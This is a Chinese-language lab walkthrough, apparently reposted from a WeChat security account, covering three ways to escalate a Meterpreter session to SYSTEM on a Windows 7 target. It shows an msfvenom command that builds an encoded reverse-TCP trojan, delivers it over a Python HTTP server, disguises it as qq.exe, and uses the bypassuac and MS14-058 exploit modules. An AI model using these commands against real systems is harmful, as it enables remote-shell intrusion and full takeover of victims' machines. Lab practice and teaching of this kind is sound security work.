三种方式内网提权

admin 2022年3月24日22:35:26评论95 views字数 889阅读2分57秒阅读模式

环境 攻击机kali2020        ip:192.168.233.133/24

        靶机 win7(32位)       ip:192.168.233.132/24


权限提升方式

1提高程序运行级别

2UAC绕过

3利用本地提权漏洞进行提权


肉鸡上线,拿到用户权限


1攻击机生成木马(msf.exe)

msfVENOM-ax86--platform windows -p windows/meterpreter/reverse_tcp

LHOST=192.168.233.133 LPORT=4444 -b"x00" -e x86/shikata_ga_nai -f exe >msf.exe


三种方式内网提权


2攻击机配置监听脚本


三种方式内网提权


3攻击机使用python,开启简单的http server,通过web服务来传送木马

(python -m SimpleHTTPServer 888)


三种方式内网提权


4win7靶机通过浏览器下载木马,并运行


三种方式内网提权

三种方式内网提权


5攻击机弹出meterpreter回话,查看权限是用户权限,提升到系统权限失败


三种方式内网提权


二提权(提升到系统权限)


1提高程序运行级别  使用msf模块(exploit/windows/local/ask) 使用高权限来运行msf.exe

并把msf.exe伪装成qq.exe


三种方式内网提权


2在靶机上点是(Y),以高权限来运行qq.exe


三种方式内网提权


3靶机以高权限运行qq.exe后,在攻击机上返回新的session(session2)


三种方式内网提权


4进入session2 并提权发现可以成功提到系统权限


三种方式内网提权


三bypass UAC提权


1在攻击机上进入bypassuac模块,show options 查看配置


三种方式内网提权


2选择低权限的会话session1 (set session 1) 后exploit,发现生成新的session3


三种方式内网提权


三种方式内网提权


3进入session3 (sessions -i 3)并提权,成为系统权限


三种方式内网提权


四 利用本地提权漏洞进行提权


1 use exploit/windows/local/ms14_058_track_popup_menu ,进入模块后选择低权限的session

(set session 1)并运行模块发现生成新的session 4 并且session 4为系统权限


三种方式内网提权

三种方式内网提权


三种方式内网提权


本文始发于微信公众号(疯猫网络):三种方式内网提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月24日22:35:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   三种方式内网提权https://cn-sec.com/archives/503696.html

发表评论

匿名网友 填写信息